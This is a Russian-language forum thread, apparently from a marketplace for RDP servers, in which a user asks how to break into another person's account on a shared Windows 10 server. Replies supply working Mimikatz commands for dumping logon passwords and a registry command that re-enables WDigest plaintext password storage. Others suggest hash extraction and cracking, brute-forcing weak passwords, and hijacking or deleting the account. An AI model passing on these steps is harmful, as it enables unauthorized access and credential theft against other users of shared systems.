Купить дедик, RDP, сервер

[Вопрос]Как можно зайти на другие учётки

Mongoler

Проверенный
Реакции
17
Депозит
0 BTC
Всем привет, у меня есть RDP и там есть 3 учётки, одна моя (админ), а так есть другая учётка на которой майнят, каким способом можно взломать учётку? И да на дедике стоит windows 10, если бы не она, то я бы не искал помощи.

• Like
Реакции: BTC

timboleik

Legendary
Реакции
81
Депозит
0 BTC
Всем привет, у меня есть RDP и там есть 3 учётки, одна моя (админ), а так есть другая учётка на которой майнят, каким способом можно взломать учётку? И да на дедике стоит windows 10, если бы не она, то я бы не искал помощи.
mimikatz есть такой софт,ищет пароли других учеток,на этот софт орут почти все антивири,имей ввиду что на дедике любой антивирь его сразу сожрут,и еще без админ прав вроде как не ищет учетки

Вот команды которые нужно ввести в окно программы

privilege::debug

log c:\passwords.txt

sekurlsa::logonpasswords

нет гарантии что 100% у тебя получится

• Like
Реакции: BTC

Mongoler

Проверенный
Реакции
17
Депозит
0 BTC
Спасибо
mimikatz есть такой софт,ищет пароли других учеток,на этот софт орут почти все антивири,имей ввиду что на дедике любой антивирь его сразу сожрут,и еще без админ прав вроде как не ищет учетки

Вот команды которые нужно ввести в окно программы

privilege::debug

log c:\passwords.txt

sekurlsa::logonpasswords

нет гарантии что 100% у тебя получится
Спасибо конечно, но этот софт у меня есть, он очень хорошо работает на windows 7 и ниже, в 10 же он не так хорошо, так как в ней пароли находятся не

arthacker

МЕСТНЫЙ
Реакции
35
Депозит
0 BTC
Спасибо

Спасибо конечно, но этот софт у меня есть, он очень хорошо работает на windows 7 и ниже, в 10 же он не так хорошо, так как в ней пароли находятся не
Просто ты мат. часть не учил, в windows 8 и выше по умолчанию отключено сохранение паролей, что нужно сделать, запускаем командную строку от имени админа и вставляем
Код:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
После перезагрузки пароли будут сохранятся так же как на вин 7

Mongoler

Проверенный
Реакции
17
Депозит
0 BTC
Просто ты мат. часть не учил, в windows 8 и выше по умолчанию отключено сохранение паролей, что нужно сделать, запускаем командную строку от имени админа и вставляем
Код:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
После перезагрузки пароли будут сохранятся так же как на вин 7
Спасибо

Brutello

МЕСТНЫЙ
Реакции
40
Депозит
0 BTC
Если ты там админ, че пароль ему не сменишь? И потом зайдешь.

delf

Проверенный
Реакции
15
Депозит
0 BTC
как вариант достать хеши пароля Лазаньей и попытаться взломать Овчаркой

utyara

МЕСТНЫЙ
Реакции
33
Депозит
0 BTC

HUKSI

МЕСТНЫЙ
Реакции
104
Депозит
0 BTC
Для всех дампов нужны админ права,если у тебя их нет,можешь побрутить локальных пользователей и если пароли слабые,то взломаешь.
Ну... а если есть админ права,то смени пароль,зайди посмотри что да как там,а потом удали его учетку

mika3407

Проверенный
Реакции
0
Депозит
0 BTC
Через реестр можно выдернуть пароли, если под адм сижу?

Mr. Brains

VIP Person
Реакции
12
Депозит
0 BTC
Тренируйтесь. Предупреждаю, данный способ не работает для подключения к дедикам под управлением Windows ниже 7/Windows Server 2008 R2, а также домашних редакций Windows, потому что на последних нельзя задействовать NLA. Но это не точно, мне просто лень заморачиваться. И да, нельзя залогиниться под учётными записями, не входящими в группу "Администраторы". Но в чём проблема временно добавить эти учётные записи в вышеупомянутую группу?!

Последнее редактирование: